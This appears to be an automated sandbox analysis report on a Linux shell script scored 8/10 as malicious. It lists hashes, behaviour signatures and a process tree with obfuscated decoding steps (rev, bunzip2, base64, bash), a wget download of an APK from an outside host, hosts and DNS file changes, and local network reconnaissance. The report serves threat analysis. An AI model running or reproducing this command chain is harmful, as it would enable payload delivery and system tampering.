Analysis
-
max time kernel
0s -
max time network
121s -
platform
linux_mips -
resource
debian9-mipsbe-en-20211208 -
resource tags
-
submitted
15/03/2023, 11:04
General
-
Target
app_mod copy.sh_
-
Size
51KB
-
MD5
5a8c1fac337fb034f3a7456b0c416758
-
SHA1
d883644c417a5f1543b88f2ac407ee84e1425420
-
SHA256
902a66ff2a651275836d70b621a02225c3cdefc98dc4d28faee3ba772f65da2b
-
SHA512
8adba312ef13f5628bffbb6f399f65d50f7479874fda4c191bc10e51fd48a49d5b8d247bc2cfbc99d6fe9a76fe5500976571d6ac4a150efae144ece3f5d1248a
-
SSDEEP
1536:DxEyGznImjPZzlz1pxvp4eWbOvWM2I306DMmAgu:DxEyGznI4xl4jOvzhDMz
Score
8/10
Malware Config
Signatures
-
Modifies hosts file 1 IoCs
Adds to hosts file used for mapping hosts to IP addresses.
-
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.
-
Reads runtime system information 2 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 6 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/app_mod copy.sh_"/tmp/app_mod copy.sh_"1⤵
- Writes file to tmp directory
-
/usr/bin/revrev1⤵
-
/bin/bunzip2bunzip2 -c1⤵
-
/usr/bin/base64base64 -d1⤵
-
/bin/catcat1⤵
-
./!"./!"1⤵
-
/bin/bashbash -c ";"1⤵
-
/usr/bin/revrev1⤵
-
/bin/bashbash1⤵
-
/bin/bash/bin/bash2⤵
-
/bin/bashbash3⤵
-
-
-
/usr/bin/base64base64 -d1⤵
-
/bin/bunzip2bunzip2 -c1⤵
-
/bin/catcat1⤵
-
./_./_1⤵
-
/bin/bashbash -c ";"1⤵
-
/usr/bin/wgetwget -o wikipedia.apk https://int3.sk/wikipedia.apk1⤵
- Modifies hosts file
- Writes DNS configuration
-
/sbin/ipip addr1⤵
-
/bin/grepgrep 1921⤵
-
/usr/bin/awkawk "{print \$2}"1⤵
-
/usr/bin/cutcut -d. -f 1-31⤵